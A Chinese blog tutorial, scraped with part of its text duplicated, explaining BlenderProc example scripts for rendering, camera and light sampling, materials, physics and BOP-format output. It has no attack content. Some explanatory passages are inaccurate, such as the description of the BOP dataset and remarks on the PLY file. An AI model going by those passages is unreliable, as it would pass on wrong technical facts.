    bproc.renderer.enable_depth_output(activate_antialiasing=False)
    # bproc.renderer.set_noise_threshold(0.01) # this is the default value

    # render the whole pipeline
    data = bproc.renderer.render()

    首先,我们需要启用 blenderproc 生成每张彩色图像的法线和距离。此外,我们设置所需的图像噪声阈值。较低的噪声阈值将减少图像中的噪声,但会增加渲染时间。默认值为 0.01,适用于大多数应用程序。

    =>在临时文件夹中创建文件 rgb_0000.pngrgb_0001.png。同时还创建法线和深度图像。

    • 法线和深度图像是使用 .exr 格式渲染的,可以线性色彩空间和更高的精度。
    • 在这里,深度图像没有反锯齿处理,意味着对于每个像素,该像素中的深度不会聚合在其表面上。虽然距离和深度图像听起来很相似,但它们并不相同:在距离图像中,每个像素都包含从摄像机位置到场景中对应点的实际距离。而在深度图像中,每个像素都包含相应点所处的与摄像机平行的平面与摄像机之间的距离。

    =>创建文件 normal_0000.exrnormal_0001.exrdistance_0000.exrdistance_0001.exr

    在本例中,所有这些文件都是临时文件,直接在渲染后读取并在临时文件夹中删除。然后将它们打包成字典并返回,保存在 data 变量中。

    FAQ:如果我们直接读取它们,为什么还要将它们存储在磁盘上?

    • Blender 没有其他选项,只能先将它们保存到磁盘,然后再读取它们。

    首先,通过调用 bproc.renderer.enable_normals_output() 和 bproc.renderer.enable_depth_output(activate_antialiasing=False) 函数,启用了法线和深度渲染。其中,enable_normals_output() 函数允许将法线渲染输出到渲染结果中,而 enable_depth_output(activate_antialiasing=False) 函数则允许将深度渲染输出到渲染结果中,并且关闭了抗锯齿选项。

    接着,调用 bproc.renderer.render() 函数,开始渲染整个渲染管线,并将渲染结果存储在 data 变量中。在渲染过程中,会依次执行多个处理步骤,包括场景图遍历、光照计算、材质映射、纹理映射等,并最终生成最终的渲染结果。渲染结束后,data 变量中将包含法线和深度信息,它们可以用来进行后续的图像处理、计算机视觉等任务。

    保存成 .hdf5 文件:

    bproc.writer.write_hdf5(args.output_dir, data)

    Camera sampling

    Usage

    blenderproc run examples/basics/camera_sampling/main.py examples/resources/scene.obj examples/basics/camera_sampling/output

    Visualization

    blenderproc vis hdf5 examples/basics/camera_sampling/output/0.hdf5
    Keys: 'colors': (512, 512, 3), 'depth': (512, 512), 'normals': (512, 512, 3)

    Code

    # Find point of interest, all cam poses should look towards it
    # 通过调用 bproc.object.compute_poi(objs) 函数,计算出一组物体的几何中心点 poi,作为相机观察的焦点。
    poi = bproc.object.compute_poi(objs)
    # Sample five camera poses
    # 采样了五个随机的相机位置,渲染出 5 张图
    for i in range(5):
    # Sample random camera location above objects
    # 通过调用 np.random.uniform([-10, -10, 8], [10, 10, 12]) 函数,从一个三维坐标区间中随机取得一个相机位置,其中相机位置的 x、y 坐标范围为 [-10, 10],z 坐标范围为 [8, 12]。
    location = np.random.uniform([-10, -10, 8], [10, 10, 12])
    # Compute rotation based on vector going from location towards poi
    # 对于每一个相机位置,进一步计算其旋转矩阵 rotation_matrix,以便将相机的视线朝向 poi 的方向。
    # 具体而言,调用 bproc.camera.rotation_from_forward_vec(poi - location, inplane_rot=np.random.uniform(-0.7854, 0.7854)) 函数,以相机位置和 poi 之间的向量作为前向向量,并通过 inplane_rot 参数加入少量的水平旋转随机性(其值在 [-0.7854, 0.7854] 范围内)来计算出旋转矩阵 rotation_matrix。
    rotation_matrix = bproc.camera.rotation_from_forward_vec(poi - location, inplane_rot=np.random.uniform(-0.7854, 0.7854))
    # Add homog cam pose based on location an rotation
    # 将相机位置和旋转信息组合为齐次相机-世界变换矩阵
    cam2world_matrix = bproc.math.build_transformation_mat(location, rotation_matrix)
    # 将其添加到 BlenderProc 中,以便后续渲染时使用。这样,就实现了对场景从不同视角的渲染。
    bproc.camera.add_camera_pose(cam2world_matrix)

    Light sampling

    Usage

    blenderproc run examples/basics/light_sampling/main.py examples/resources/camera_positions examples/resources/scene.obj examples/basics/light_sampling/output

    Visualization

    blenderproc vis hdf5 examples/basics/light_sampling/output/0.hdf5

    png

    Code

    # Define a light
    light = bproc.types.Light()
    light.set_type("POINT")
    # Sample its location in a shell around the point [1, 2, 3]
    light.set_location(bproc.sampler.shell(
    center=[1, 2, 3],
    radius_min=4,
    radius_max=7,
    elevation_min=15,
    elevation_max=70
    ))
    light.set_energy(500)

    这段代码的含义是:

    首先,创建了一个名为 light 的 BlenderProc Light 类型变量。

    接着,通过调用 light.set_type(“POINT”) 函数,指定该光源为点光源类型,即在三维空间中的某一点产生均匀辐射的光源。

    然后,通过调用 bproc.sampler.shell(center=[1, 2, 3], radius_min=4, radius_max=7, elevation_min=15, elevation_max=70) 函数,生成一个位于包围点 [1, 2, 3] 的球壳内的随机三维坐标位置,并将其设置为光源的位置,以实现光源位置的随机性。具体而言,函数的参数如下:

    • center=[1, 2, 3]:球心位置为 [1, 2, 3]。
    • radius_min=4:球壳内径的最小值为 4。
    • radius_max=7:球壳外径的最大值为 7。
    • elevation_min=15:光源位置相对于球心高度的最小值为 15 度。
    • elevation_max=70:光源位置相对于球心高度的最大值为 70 度。

    最后,通过调用 light.set_energy(500) 函数,将光源的强度 energy 设置为 500 瓦特,以控制光照亮度。

    # render the whole pipeline
    data = bproc.renderer.render()

    # Collect states of all objects
    object_states = []
    for obj in objs:
    object_states.append({
    "name": obj.get_name(),
    "local2world": obj.get_local2world_mat()
    })
    # Add states (they are the same for all frames here)
    data["object_states"] = [object_states] * bproc.utility.num_frames()

    # Collect state of the one light
    light_state = {
    "name": light.get_name(),
    "local2world": light.get_local2world_mat(),
    "energy": light.get_energy()
    }
    # Add states (its the same for all frames here)
    data["light_states"] = [light_state] * bproc.utility.num_frames()

    # Collect state of the camera at all frames
    cam_states = []
    for frame in range(bproc.utility.num_frames()):
    cam_states.append({
    "cam2world": bproc.camera.get_camera_pose(frame),
    "cam_K": bproc.camera.get_intrinsics_as_K_matrix()
    })
    # Adds states to the data dict
    data["cam_states"] = cam_states

    这段代码的含义是:

    首先,通过调用 bproc.renderer.render() 函数,对当前的场景进行渲染,并将渲染结果存储在 data 变量中。

    接着,通过遍历 objs 列表中的每一个对象 obj,将 obj 的名称和本地坐标系到世界坐标系的变换矩阵信息添加到 object_states 列表中。

    然后,将 object_states 列表复制 num_frames 次,并将其作为数据字典 data 中键名为 “object_states” 的值,表示所有帧的物体状态相同。

    接下来,将 light 对象的名称、本地坐标系到世界坐标系的变换矩阵信息和能量值信息添加到 light_state 字典中,并将其复制 num_frames 次并添加到 data 中键名为 “light_states” 的值中,表示所有帧的光源状态相同。

    最后,通过循环遍历所有帧的索引 frame,将每一帧相机的相机坐标系到世界坐标系的变换矩阵 cam2world 和相机的内参矩阵 K 添加到 cam_states 列表中,并将其作为数据字典 data 中键名为 “cam_states” 的值,表示所有帧的相机状态。

    Object selection and manipulation

    Usage

    blenderproc run examples/basics/entity_manipulation/main.py examples/resources/scene.obj examples/basics/entity_manipulation/output

    Visualization

    blenderproc vis hdf5 examples/basics/entity_manipulation/output/0.hdf5

    png

    Code

    # load the objects into the scene
    objs = bproc.loader.load_obj(args.scene)

    # Find object with name Suzanne
    suzanne = bproc.filter.one_by_attr(objs, "name", "Suzanne")
    # Set its location and rotation
    suzanne.set_location(np.random.uniform([0, 1, 2], [1, 2, 3]))
    suzanne.set_rotation_euler([1, 1, 0])

    这个示例的重点是使用 BlenderProc 进行过滤操作以及设置对象的旋转和位置。

    在此过滤操作中,我们将条件设置为:"name": 'Suzanne',意思是我们想要选择所有满足 obj.name == 'Suzanne' 的对象。在这种情况下,只有一个对象符合要求。如果我们想要选择多个元素,我们可以使用 bproc.filter.by_attr() 函数。这样就可以选择多个对象。

    请注意:任何给定的字符串类型属性值都可以被视为正则表达式,只需在 one_by_attr fct. 调用中设置 regex=True 即可。因此,"name": 'Cylinder.*' 的条件将选择场景中的所有三个圆柱体。

    要查看所有可能的属性名称,请查阅官方 Blender 文档:https://docs.blender.org/api/current/bpy.types.Object.html。

    Material selection and manipulation

    Usage

    blenderproc run examples/basics/material_manipulation/main.py examples/basics/material_manipulation/scene.obj images examples/basics/material_manipulation/output
    • examples/basics/material_manipulation/main.py: path to the python file.
    • examples/basics/material_manipulation/scene.obj: path to the object file with the basic scene.
    • images: path to a folder with .jpg textures to be used in the sampling process.
    • examples/basics/material_manipulation/output: path to the output directory.

    Visualization

    blenderproc vis hdf5 examples/basics/material_manipulation/output/0.hdf5

    png

    # Find all materials
    materials = bproc.material.collect_all()

    # Find the material of the ground object
    ground_material = bproc.filter.one_by_attr(materials, "name", "Material.001")
    # Set its displacement based on its base color texture
    ground_material.set_displacement_from_principled_shader_value("Base Color", multiply_factor=1.5)

    这段代码的作用是:

    1. 使用 bproc.material.collect_all()函数查找所有材质。
    2. 使用 bproc.filter.one_by_attr()函数通过属性查找特定材质。在这种情况下,我们使用 “name”: “Material.001” 来查找 ground object 的材质。
    3. 使用 ground_material.set_displacement_from_principled_shader_value()函数来设置基于其基础颜色纹理的位移。在这种情况下,我们将 multiply_factor 设置为 1.5,以增加位移强度。

    这段代码的目的是修改指定材质的属性,实现更具创意的渲染效果。

    # Collect all jpg images in the specified directory
    images = list(Path(args.image_dir).absolute().rglob("material_manipulation_sample_texture*.jpg"))
    for mat in materials:
    # Load one random image
    image = bpy.data.images.load(filepath=str(random.choice(images)))
    # Set it as base color of the current material
    mat.set_principled_shader_value("Base Color", image)

    这段代码的作用是:

    1. 使用 pathlib 库中的 Path() 函数来设置指定目录(args.image_dir)的绝对路径,并通过 rglob() 函数找到该目录下所有以 “material_manipulation_sample_texture*.jpg” 结尾的文件。

    png

    1. 遍历所有材质,为每个材质设置随机选择的纹理。在这里,我们使用了 random.choice() 函数从上一步中收集到的所有图像中随机选择一个。然后通过 mat.set_principled_shader_value() 函数将其设置为当前材质的基础颜色。

    这段代码的目的是为指定的 Blender 场景中的所有材质添加多样化的纹理素材,以增强渲染效果和真实感。

    Physics positioning

    Usage

    blenderproc run examples/basics/physics_positioning/main.py examples/basics/physics_positioning/active.obj examples/basics/physics_positioning/passive.obj examples/basics/physics_positioning/output
    • examples/basics/physics_positioning/main.py: path to the python file.
    • examples/basics/physics_positioning/active.obj: path to the object file with active objects, i. e. objects which we want to participate in physics simulation.
    • examples/basics/physics_positioning/passive.obj: path to the object file with passive objects, i. e. objects which we do not want to participate in physics simulation, e.g. plane.
    • examples/basics/physics_positioning/output: path to the output directory.

    Visualization

    blenderproc vis hdf5 examples/basics/physics_positioning/output/0.hdf5

    png

    Code

    # Define a function that samples the pose of a given sphere
    def sample_pose(obj: bproc.types.MeshObject):
    obj.set_location(np.random.uniform([-5, -5, 8], [5, 5, 12]))
    obj.set_rotation_euler(bproc.sampler.uniformSO3())

    # Sample the poses of all spheres above the ground without any collisions in-between
    bproc.object.sample_poses(
    spheres,
    sample_pose_func=sample_pose
    )

    首先,我们定义一个函数,将给定的物体设置为新的姿态。然后,在 bproc.object.sample_poses 函数调用中使用该函数,在每个物体上调用它,然后检查是否与其他物体发生碰撞。这个过程会重复进行,直到所有物体都被放置且没有发生碰撞。

    这段代码的作用是:

    1. 定义一个名为 sample_pose() 的函数,该函数接受一个 bproc.types.MeshObject 对象作为参数,并对其进行位置和旋转属性的随机抽样,以模拟物体在 3D 空间中的运动姿态。具体来说,我们使用 obj.set_location() 函数将物体的位置坐标随机设置在 [-5,-5,8] 到 [5,5,12] 的范围内,并使用 obj.set_rotation_euler() 函数将物体的欧拉旋转角度随机设置。
    2. 使用 bproc.object.sample_poses() 函数对所有位于地面上方的 sphere 进行姿态抽样,同时确保每个 sphere 之间没有碰撞发生。我们通过传递 spheres 和 sample_pose_func 参数来执行这一操作。其中,spheres 指代待采样的所有 sphere 对象的列表,sample_pose_func 参数指定了姿态抽样函数,即上述定义的 sample_pose() 函数。

    这段代码的目的是模拟物体的动态运动过程,以增加渲染效果的真实感。

    # Make all spheres actively participate in the simulation
    # 通过循环遍历所有的球体对象 spheres,调用 obj.enable_rigidbody(active=True) 函数使其能够参与物理仿真。其中 active=True 代表该球体是主动物体,需要施加力和碰撞等物理效应。
    for obj in spheres:
    obj.enable_rigidbody(active=True)
    # The ground should only act as an obstacle and is therefore marked passive.
    # To let the spheres fall into the valleys of the ground, make the collision shape MESH instead of CONVEX_HULL.
    # 将地面对象 ground 的 enable_rigidbody 函数的 active 设置为 False,表示它是被动物体,只参与碰撞等物理效应,并调整地面的碰撞形状为 MESH,以便让球体可以掉落到地面的洼地中。
    ground.enable_rigidbody(active=False, collision_shape="MESH")

    # Run the simulation and fix the poses of the spheres at the end
    # 调用 bproc.object.simulate_physics_and_fix_final_poses(min_simulation_time=4, max_simulation_time=20, check_object_interval=1) 函数来运行物理仿真并在结束时固定球体的位置。具体而言,min_simulation_time 和 max_simulation_time 分别指示物理仿真的最小和最大时间(秒),check_object_interval 则指示固定物体位置时检查位置的时间间隔(秒)。在本例中,物理仿真时间介于 4s 和 20s 之间,每秒钟检查一次物体位置并固定。(注意:如果没有启用物理,该函数将不起作用。)
    bproc.object.simulate_physics_and_fix_final_poses(min_simulation_time=4, max_simulation_time=20, check_object_interval=1)

    这段代码的作用是:

    1. 将所有 sphere 对象设置为活动态,通过启用其刚体属性(rigidbody)实现。对于地面来说,将 active 属性设置为 False,这意味着它在场景中是被动的,但可以和其他活动态物体发生交互。此外,我们还使用 MESH 碰撞形状(collision shape)而不是默认的 CONVEX_HULL 碰撞形状来设置 ground 物体的碰撞形状。需要注意的是,在更复杂的用例中使用 mesh 碰撞形状可能会导致性能问题和错误。如果出现这些情况,最好尝试使用 physics_convex_decomposition。
    2. 在运行物理仿真时,函数每隔 1 秒检查一次是否仍有对象在运动。如果没有,就停止仿真。然而,仿真至少运行 4 秒,最多运行 20 秒。
    3. 在仿真结束时,将所有 sphere 的位置重新固定。这样,我们可以轻松采样位于凹凸不平的平面上方的 sphere 的随机位置。

    这段代码的目的是模拟物体之间的物理交互和运动过程,以增加渲染效果的真实感。

    Semantic Segmentation

    Usage

    blenderproc run examples/basics/semantic_segmentation/main.py examples/resources/camera_positions examples/basics/semantic_segmentation/scene.blend examples/basics/semantic_segmentation/output
    • examples/basics/semantic_segmentation/main.py: path to the python file.
    • examples/resources/camera_positions: text file with parameters of camera positions.
    • examples/basics/semantic_segmentation/scene.blend: path to the blend file with the basic scene.
    • examples/basics/semantic_segmentation/output: path to the output directory.

    Visualization

    blenderproc vis hdf5 examples/basics/semantic_segmentation/output\1.hdf5

    png

    Code

    # load the objects into the scene
    objs = bproc.loader.load_blend(args.scene)

    这个代码段加载了 .blend 文件,从文件中仅提取网格对象,而不是提取该 .blend 文件中存储的所有信息。

    需要注意的是,在加载的 .blend 文件中,所有对象都已经设置了属性名称为“category_id”的自定义属性。这可以通过手动执行以下步骤来完成:

    obj.set_cp("category_id", 0)
    # enable segmentation masks (per class and per instance)
    bproc.renderer.enable_segmentation_output(map_by=["category_id", "instance", "name"])

    这个模块可以将任何类型的对象相关信息映射到图像或场景中对象的索引列表。例如,如果你想要将自定义属性 category_id 映射到图像上,可以设置 map_by=["category_id"]。然后,每个像素都会被分配一个现有像素中的对象的自定义属性 category_id。如果它被设置为实例化,每个像素将获得一个场景中对象的 id,这些 id 对于多帧是一致的,这也意味着并不是每个图像中都必须出现所有的 id。

    此外,还可以将其设置为对象类的不同自定义属性或属性,如“name”,这将返回每个对象的名称。这无法保存在图像中,因此需要生成一个额外的字典,附加到最终的 .hdf5 容器中。其中,它将每个实例编号映射到一个名称。如果有不能存储在图像中的键,则必须生成一个实例图像,否则会引发错误消息。

    例如,也可以使用属性:“location”。这将访问每个对象的位置并将其添加到字典中。需要注意的是,如果背景可见,则会引发错误,因为背景没有位置属性。这可以通过提供默认值来避免,例如:default_values={"location: [0,0,0]}

    Camera Object Pose Setting

    Usage

    blenderproc run examples/basics/camera_object_pose/main.py examples/basics/camera_object_pose/obj_000004.ply examples/basics/camera_object_pose/output
    • examples/basics/camera_object_pose/main.py: Python 文件的路径。

    随后的参数用于填充配置文件中的占位符,例如 <args:0>

    • examples/basics/camera_object_pose/obj_000004.ply: 模型文件的路径,在这里是 hb 数据集中的一个基本对象。
    ply
    format ascii 1.0
    element vertex 59070
    property float x
    property float y
    property float z
    property float nx
    property float ny
    property float nz
    property uchar red
    property uchar green
    property uchar blue
    property uchar alpha
    element face 118136
    property list uchar int vertex_indices
    end_header
    -74.8915252685546875 -19.9308242797851562 -39.8891220092773438 -0.881483376026153564 0.153793498873710632 -0.446469098329544067 201 194 89 255
    -74.283599853515625 -19.7608661651611328 -40.8353233337402344 -0.821542501449584961 0.139040097594261169 -0.552933812141418457 203 203 102 255
    -74.7142333984375 -19.3212966918945312 -39.9898719787597656 -0.876855313777923584 0.193883597850799561 -0.43992498517036438 201 196 92 255

    ...

    3 276 277 275
    3 279 278 249
    3 279 249 252

    ...

    这个 ply 文件包含了一个三角网格模型的数据,其中每行数据表示一个顶点或者一个三角面的信息。下面是文件中的每个部分的解释:

    第一行指定了文件使用的 PLY 文件格式。

    第二行指定了文件的数据格式为 ASCII 格式,版本为 1.0。

    第三行声明该模型包含 59070 个顶点。

    第四行到第十行分别声明了顶点数据中包含的属性,分别是 x,y,z 坐标和法线 nx,ny,nz 以及颜色属性 red,green,blue,alpha。

    第十一行声明该模型包含 118136 个三角形(即面)。

    第十二行定义了面数据的属性列表,包括每个面由几个顶点组成以及对应的顶点索引。

    第十三行是文件头与数据部分的分隔符。

    从第十四行开始每一行都表示一个顶点的信息,按照 x,y,z 坐标、法线 nx,ny,nz 和颜色属性 red,green,blue,alpha 依次排列。

    从最后一个顶点的信息结束后,文件中间间隔了若干空行,接下来每一行表示一个三角形面,格式为"3 a b c",表示该面由三个顶点 a,b,c 组成,a,b,c 分别是该点在顶点列表中的索引。

    总的来说,这个 PLY 文件描述了一个三角网格模型,包含了所需的顶点和面数据,可以被一些三维建模软件或者游戏引擎读取和展示。

    • examples/basics/camera_object_pose/output: 输出目录的路径。

    png

    BOP 数据集形式的输出

    Code

    # Use vertex color for texturing
    for mat in obj.get_materials():
    mat.map_vertex_color()
    # Set pose of object via local-to-world transformation matrix
    obj.set_local2world_mat(
    [[0.331458, -0.9415833, 0.05963787, -0.04474526765165741],
    [-0.6064861, -0.2610635, -0.7510136, 0.08970402424862098],
    [0.7227108, 0.2127592, -0.6575879, 0.6823395750305427],
    [0, 0, 0, 1.0]]
    )
    # Scale 3D model from mm to m
    obj.set_scale([0.001, 0.001, 0.001])
    # Set category id which will be used in the BopWriter
    obj.set_cp("category_id", 1)
    • 将所有材质转换为顶点颜色(vertex color)材质,并直接使用每个加载的 .ply 对象的顶点颜色。这意味着,我们不再使用原始材质文件,而是用顶点颜色来渲染场景。
    • 设置物体姿态的 matrix_world 属性为米(meter)单位。
    • 按照每个维度的尺寸比例,将模型从毫米(mm)单位缩放到米(meter)单位。需要注意的是,如果模型已经以米(meter)为单位,则不需要执行这一步操作。
    • 设置一个新的自定义属性 "category_id",并将其设置为 1。后面的分割渲染器将使用该属性。

    这段代码的目的是对加载的模型进行预处理和优化,以便更好地适应后续渲染流程的需要。其中,将材质转换为顶点颜色材质可以减少纹理贴图的计算量,使场景更易于渲染;缩放模型到标准的米(meter)单位可以方便控制场景尺寸及物体之间距离的关系;设置自定义属性可以增加场景元素的分类信息,让后续的分割渲染器能够更好地区分不同的物体。

    # Set intrinsics via K matrix
    # 通过相机矩阵 K 设置相机内参(intrinsics)。
    # K 矩阵包括相机的焦距、主点和畸变参数等,用于描述相机的内部光学特性。函数将 K 矩阵作为参数,同时指定了最终图像的宽度和高度。
    bproc.camera.set_intrinsics_from_K_matrix(
    [[537.4799, 0.0, 318.8965],
    [0.0, 536.1447, 238.3781],
    [0.0, 0.0, 1.0]], 640, 480
    )
    # Set camera pose via cam-to-world transformation matrix
    # 通过摄像机到世界坐标系的变换矩阵设置相机姿态(pose)。其中,变换矩阵 cam2world 描述了相机坐标系相对于世界坐标系的变换关系。该变换矩阵通常由外部传感器提供,如惯性测量单元(IMU)、GPS 等。
    cam2world = np.array([
    [1, 0, 0, 0],
    [0, 1, 0, 0],
    [0, 0, 1, 0],
    [0, 0, 0, 1]
    ])
    # Change coordinate frame of transformation matrix from OpenCV to Blender coordinates
    # 由于使用的是 OpenCV 坐标系,所以需要将坐标系转换为 Blender 中的坐标系。
    cam2world = bproc.math.change_source_coordinate_frame_of_transformation_matrix(cam2world, ["X", "-Y", "-Z"])
    bproc.camera.add_camera_pose(cam2world)

    这段代码的目的是对相机的内部光学特性和相对位置进行设置。通过设置相机内参和姿态,可以精确地模拟相机在场景中的位置、朝向,以及捕捉图像时的畸变效果等。这有助于实现更逼真的渲染效果,并提高视觉算法的精度。

    • 通过调用 set_intriniscs_from_K_matrix 来设置相机的 K 矩阵。
    • 相机的位姿由其世界矩阵定义,在这种情况下,它只是单位矩阵。
    • 将相机源帧更改为匹配 Blender 帧(这将从 OpenCV 坐标系转换为 Blender 的坐标系)。
    • 最后,将这个新的相机矩阵添加到位姿中,即可渲染。
    # render the whole pipeline
    data = bproc.renderer.render()

    # Write object poses, color and depth in bop format
    bproc.writer.write_bop(args.output_dir, [obj], data["depth"], data["colors"], m2mm=True, append_to_existing_output=True)

    BOP 数据集是一个公共的工业场景物体姿态估计数据集,包含了 80 个具有挑战性的工业部件,每个部件都有不同的材质、变形、表面纹理和反光性质。BOP 数据集中每个部件都拍摄了数百张带有真实噪声深度信息和 RGB 图像的灰度图。此外,BOP 数据集还提供了每个部件的正式模型,即 CAD 文件,以便将您的方法与 CAD 进行比较。BOP 的主要目的是为评估工业场景物体姿态估计算法提供标准化基准。

    • 保存 BOP 数据集中提供的所有姿态和相机信息。
    • "m2mm" 将姿态转换为毫米,与原始的 BOP 标注一致。如果想要使用米作为单位则设置为 False。
    • "append_to_existing_output" 表示如果选择了相同的输出文件夹,则数据将被追加而不是覆盖。
    ]]>
    + 资源

    仓库地址:DLR-RM/BlenderProc: A procedural Blender pipeline for photorealistic training image generation (github.com),下载到本地,用 python 打开,解释器使用之前创建的 blender 环境。

    正文

    Basic example

    Usage

    示例代码在 examples/basics/basic/main.py 中。shell 中输入:

    1
    blenderproc run examples/basics/basic/main.py examples/resources/camera_positions examples/resources/scene.obj examples/basics/basic/output

    即可开跑!我说婷婷,会报错:

    1
    2
    3
    4
    5
    6
    7
    It seems the freeimage library which is necessary to read .exr files cannot be found on your computer.
    Gonna try to download it automatically.
    Imageio: 'freeimage-3.15.1-win64.dll' was not found on your computer; downloading it now.
    Error while fetching file: <urlopen error timed out>.
    Error while fetching file: The read operation timed out.
    Error while fetching file: <urlopen error timed out>.
    Error while fetching file: <urlopen error timed out>.

    我设了个全局代理和 TUN 模式再多跑几次就可以了 orz

    png

    这么看从网上下载 freeimage-3.15.1-win64.dll,然后放到 C:\Users\XXXX\AppData\Local\imageio\freeimage\ 下也是可以的!

    1
    File saved as C:\Users\XXXX\AppData\Local\imageio\freeimage\freeimage-3.15.1-win64.dll.
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    Warning: Changed install path from /home_local\XXX... to C:\Users\XXX..., there is no /home_local/ on this machine.
    Using blender in C:\Users\XXX\blender\blender-3.3.0-windows-x64
    Using temporary directory: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b
    Blender 3.3.0 (hash 0759f671ce1f built 2022-09-07 00:44:18)
    Selecting render devices...
    Device NVIDIA GeForce RTX 4060Laptop GPU of type OPTIX found and used.
    Device 13th Gen Intel Core i9-13900HX of type CPU found and used.
    Timer 'OBJ_import' took 1.5ms
    Fra:0 Mem:10.46M (Peak 10.69M) | Time:00:00.16 | Mem:0.00M, Peak:0.00M | Scene, ViewLayer | Synchronizing object | Cube
    Fra:0 Mem:10.47M (Peak 10.69M) | Time:00:00.17 | Mem:0.00M, Peak:0.00M | Scene, ViewLayer | Synchronizing object | Suzanne

    ...

    Fra:0 Mem:85.58M (Peak 85.58M) | Time:00:01.04 | Compositing | Tile 4-4
    Fra:0 Mem:85.52M (Peak 85.58M) | Time:00:01.04 | Compositing | De-initializing execution
    Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\normals_0000.exr
    Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\depth_0000.exr
    Saved: 'C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\rgb_0000.png'
    Time: 00:01.36 (Saving: 00:00.30)

    Fra:1 Mem:31.51M (Peak 85.58M) | Time:00:00.00 | Mem:0.46M, Peak:0.46M | Scene, ViewLayer | Initializing
    Fra:1 Mem:31.51M (Peak 85.58M) | Time:00:00.00 | Mem:0.46M, Peak:0.46M | Scene, ViewLayer | Waiting for render to start

    ...

    Fra:1 Mem:85.58M (Peak 85.58M) | Time:00:00.83 | Compositing | Tile 4-4
    Fra:1 Mem:85.52M (Peak 85.58M) | Time:00:00.83 | Compositing | De-initializing execution
    Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\normals_0001.exr
    Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\depth_0001.exr
    Saved: 'C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\rgb_0001.png'
    Time: 00:00.86 (Saving: 00:00.01)

    Merging data for frame 0 into examples/basics/basic/output\0.hdf5
    Merging data for frame 1 into examples/basics/basic/output\1.hdf5

    Blender quit
    Cleaning temporary directory

    Visualization

    1
    blenderproc vis hdf5 examples/basics/basic/output/0.hdf5

    渲染了 colors、depth、normals 三张图片:

    png

    Code

    接受三个 parser 参数:

    • examples/resources/camera_positions:相机参数文本文件。

    png

    第一行数据表示相机位于 (0, -13.741, 4.1242) 的位置,其绕 x 轴旋转角度为 1.3,绕 y 轴旋转角度为 0,绕 z 轴旋转角度为 0。

    第二行数据表示相机位于 (1.9488, -6.5202, 0.23291) 的位置,其绕 x 轴旋转角度为 1.84,绕 y 轴旋转角度为 0,绕 z 轴旋转角度为 0.5。

    • examples/resources/scene.obj:obj 文件,basic scene 的信息。

    png

    这是一个 Wavefront OBJ 文件,它是一种 3D 对象文件格式。该文件包含了多个物体:“Cube” 和 “Cube.001” 等。

    在文件的开头,有一行 “mtllib scene.mtl”,表示该文件引用了一个名为 “scene.mtl” 的材质库文件,其中定义了这些物体所使用的材质/纹理信息。

    接下来,通过使用 “v”,“vt”,和 “vn” 关键字定义了每一个物体的顶点位置、纹理坐标和法向量。

    具体来说,每一个 “v” 后面的三个数值表示一个顶点的 x,y 和 z 坐标;

    每一个 “vt” 后面的两个数值表示一个纹理坐标值,在这个文件中,它们是相对于材质图像的位置;

    每一个 “vn” 后面的三个数值表示一个法向量的 x,y 和 z 分量。

    下面排列的 “f” 行表示了多边形,每一个 “f” 后面跟随着一些数字,这些数字表示该多边形的组成部分。

    在这个文件中,不同的数字之间使用斜线 “/” 分隔。

    具体来说,每一个数字表示该物体的一个顶点,该顶点由前面的 “v” 行中相应编号的顶点位置信息定义,而后面的数字则来自前面的 “vt” 和 “vn” 行。

    每一行的最后一个数字是该多边形的法向量,这个法向量来自 “vn” 行,指定了多边形所在平面的朝向。

    “s off” 表示关闭了 smooth shading,即不使用平滑着色技术。

    • examples/basics/basic/output:输出文件路径
    1
    2
    3
    4
    5
    6
    7
    8
    import blenderproc as bproc
    import argparse

    parser = argparse.ArgumentParser()
    parser.add_argument('camera', help="Path to the camera file, should be examples/resources/camera_positions")
    parser.add_argument('scene', help="Path to the scene.obj file, should be examples/resources/scene.obj")
    parser.add_argument('output_dir', help="Path to where the final files, will be saved, could be examples/basics/basic/output")
    args = parser.parse_args()

    初始化 blenderproc:

    1
    bproc.init()

    args.scene 中载入模型场景:

    1
    objs = bproc.loader.load_obj(args.scene)

    载入灯光:

    1
    2
    3
    4
    5
    # define a light and set its location and energy level
    light = bproc.types.Light()
    light.set_type("POINT")
    light.set_location([5, -5, 5])
    light.set_energy(1000)

    载入相机:这段代码的作用是设置相机分辨率,并读取相机位置信息并转换为齐次相机-世界变换矩阵。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    # define the camera resolution
    # 首先,调用 bproc.camera.set_resolution() 函数来定义相机的分辨率,该函数接受两个参数,即相机图像的宽度和高度。在这个示例中,我们将相机分辨率设置为 512x512。
    bproc.camera.set_resolution(512, 512)

    # read the camera positions file and convert into homogeneous camera-world transformation
    with open(args.camera, "r") as f:
    for line in f.readlines():
    # 使用一个 for 循环来逐行读取相机位置文件中的信息,并将每个位置信息转换为齐次变换矩阵,并通过调用 bproc.camera.add_camera_pose() 函数将其添加到 BlenderProc 中。
    line = [float(x) for x in line.split()]
    position, euler_rotation = line[:3], line[3:6]
    matrix_world = bproc.math.build_transformation_mat(position, euler_rotation)
    bproc.camera.add_camera_pose(matrix_world)

    渲染图像:

    1
    2
    3
    4
    5
    6
    7
    # activate normal and depth rendering
    bproc.renderer.enable_normals_output()
    bproc.renderer.enable_depth_output(activate_antialiasing=False)
    # bproc.renderer.set_noise_threshold(0.01) # this is the default value

    # render the whole pipeline
    data = bproc.renderer.render()

    首先,我们需要启用 blenderproc 生成每张彩色图像的法线和距离。此外,我们设置所需的图像噪声阈值。较低的噪声阈值将减少图像中的噪声,但会增加渲染时间。默认值为 0.01,适用于大多数应用程序。

    =>在临时文件夹中创建文件 rgb_0000.pngrgb_0001.png。同时还创建法线和深度图像。

    • 法线和深度图像是使用 .exr 格式渲染的,可以线性色彩空间和更高的精度。
